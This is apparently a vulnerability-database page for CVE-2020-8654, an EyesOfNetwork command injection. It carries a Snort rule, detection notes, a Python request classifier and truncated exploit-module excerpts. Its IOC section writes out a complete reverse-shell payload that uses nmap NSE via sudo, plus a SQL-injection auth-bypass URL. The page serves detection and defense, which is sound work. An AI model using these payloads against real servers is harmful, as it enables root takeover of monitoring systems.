CVE-2020-8654
Published 2020-02-07
Priority: P276 (high); CVSS 3.1 base score 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit available
EPSS: 85.65% (99.7th percentile)
An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS commands via the /module/module_frame/index.php autodiscovery.php target field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eyesofnetwork | eyesofnetwork | — | — |
Detection & IOCs (extracted from sources)
url: /lilac/autodiscovery.php
command: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
url: /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
Snort rule:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- Exploit POST requests to /lilac/autodiscovery.php contain the body parameters request=autodiscover, job_name=, nmap_binary, target[], and os.execute(; all five present at once indicate active exploitation.
- The injection payload is placed in the target[] POST parameter and begins with a semicolon to break out of the nmap command context, e.g. ';id #' or ';echo ... > /tmp/h4k;sudo /usr/bin/nmap ...'.
- The exploit writes a malicious Nmap NSE script to /tmp/h4k and then invokes 'sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k' for privilege escalation. Monitor for nmap spawned by the apache user with --script pointing into /tmp/.
- Authentication bypass via SQL injection uses the /eonapi/getApiKey endpoint with a UNION SELECT payload in the username parameter. Monitor for 'union select' strings in GET requests to /eonapi/getApiKey.
- The exploit tool uses a distinctive non-standard User-Agent string for all HTTP requests; presence of this UA in web logs targeting EON endpoints is a strong indicator of exploit tool usage.
- Successful exploitation results in a new admin user being created via POST to /eonapi/createEonUser. Monitor for unexpected admin user creation events in EON API logs.
- Version fingerprinting probe: attackers GET /css/eonweb.css and extract the '# VERSION :' string via regex to confirm a vulnerable EON version (5.1–5.3) before exploiting.
- HTTPS (SSL on port 443) is required for the Metasploit module to function; the exploit will not work over plain HTTP.
- The exploit requires valid credentials for a user with administrative privileges, but can bypass authentication via a hardcoded API key (CVE-2020-8657) or SQL injection (CVE-2020-8656).
- The Nuclei detection template only performs a passive version check via /css/eonweb.css and does not actively trigger the vulnerability; it matches EON versions 5.1 through 5.3.
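The HTTP-layer indicators above as a small classifier, added here as an example (it is not code from the page, the ET rule, or any listed tool): it applies the Snort rule's conditions (POST to /lilac/autodiscovery.php with all five body markers, case-insensitive) and the getApiKey 'union select' check to a raw request, over constructed sample requests.

```python
from typing import Optional
from urllib.parse import unquote_plus

# Body substrings the Snort rule (sid:2034311) requires to all be present.
AUTODISCOVER_MARKERS = ("request=autodiscover", "job_name=", "nmap_binary",
                        "target[]", "os.execute(")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, uri, body), or None."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ")
    if len(parts) < 2:
        return None
    return parts[0], parts[1], body


def classify(raw: str) -> Optional[str]:
    """Return the indicator a request matches, or None if it looks benign."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, uri, body = parsed
    path, _, query = uri.partition("?")
    # Command-injection indicator: POST to autodiscovery.php whose body
    # carries every marker (case-insensitive, like the rule's nocase).
    if method == "POST" and path.endswith("/lilac/autodiscovery.php"):
        lowered = body.lower()
        if all(m in lowered for m in AUTODISCOVER_MARKERS):
            return "CVE-2020-8654 autodiscovery command injection"
    # Auth-bypass indicator: 'union select' in the URL-decoded getApiKey query.
    if method == "GET" and path.endswith("/eonapi/getApiKey"):
        if "union select" in unquote_plus(query).lower():
            return "CVE-2020-8656 getApiKey SQL injection"
    return None


# Constructed sample requests (not captured traffic).
SAMPLE_EXPLOIT = ("POST /lilac/autodiscovery.php HTTP/1.1\r\nHost: eon.example\r\n\r\n"
                  "request=autodiscover&job_name=scan&nmap_binary=/usr/bin/nmap"
                  "&target[]=;echo \"os.execute(...)\" > /tmp/h4k #")
SAMPLE_SQLI = ("GET /eonapi/getApiKey?&username=%27%20union%20select%201%20or%20%27"
               "&password=x HTTP/1.1\r\nHost: eon.example\r\n\r\n")
SAMPLE_BENIGN = ("POST /lilac/autodiscovery.php HTTP/1.1\r\nHost: eon.example\r\n\r\n"
                 "request=autodiscover&job_name=weekly&nmap_binary=/usr/bin/nmap"
                 "&target[]=10.0.0.0/24")

if __name__ == "__main__":
    for name, req in (("exploit", SAMPLE_EXPLOIT), ("sqli", SAMPLE_SQLI), ("benign", SAMPLE_BENIGN)):
        print(name, "->", classify(req))
```

A legitimate autodiscovery job (SAMPLE_BENIGN) carries four of the five markers, which is why the rule requires os.execute( as well.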
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
Suricata
ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
suricata · 2021-11-01 · CVSS 8.8
Rule: sid:2034311, as listed under Detection & IOCs above.
Exploit-DB
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
exploitdb · 2020-03-05 · CVE-2020-8657
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'EyesOfNetwork AutoDiscovery Target Command Execution',
'Description' => %q{
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
and prior in order to execute arbitrary commands as root.
This module takes advantage of a command injection vulnerability in the
`target` parameter of the AutoDiscovery functionality within the EON web
interface in order to write an Nmap NSE script containing the payload to
disk. It then starts an Nmap scan to activate the payload. This results in
privilege escalation because the `apache` user can execute Nm
Exploit-DB
EyesOfNetwork 5.3 - Remote Code Execution
exploitdb · 2020-02-07 · CVSS 8.8 · CVE-2020-8656 [HIGH]
---
# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module allows running arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have
Nuclei
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
nuclei · CVSS 8.8 · CVE-2020-8654 [HIGH]
EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
Template:
id: CVE-2020-8654
info:
  name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
  author: praetorian-thendrickson
  severity: high
  description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context
Metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
metasploit
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root. This module takes advantage of a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface in order to write an Nmap NSE script containing the payload to disk. It then starts an Nmap scan to activate the payload. This results in privilege escalation because the `apache` user can execute Nmap as root. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via various methods, depending on the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL injectio
No writeups or analysis indexed.
References:
- http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html
- https://github.com/EyesOfNetworkCommunity/eonweb/issues/50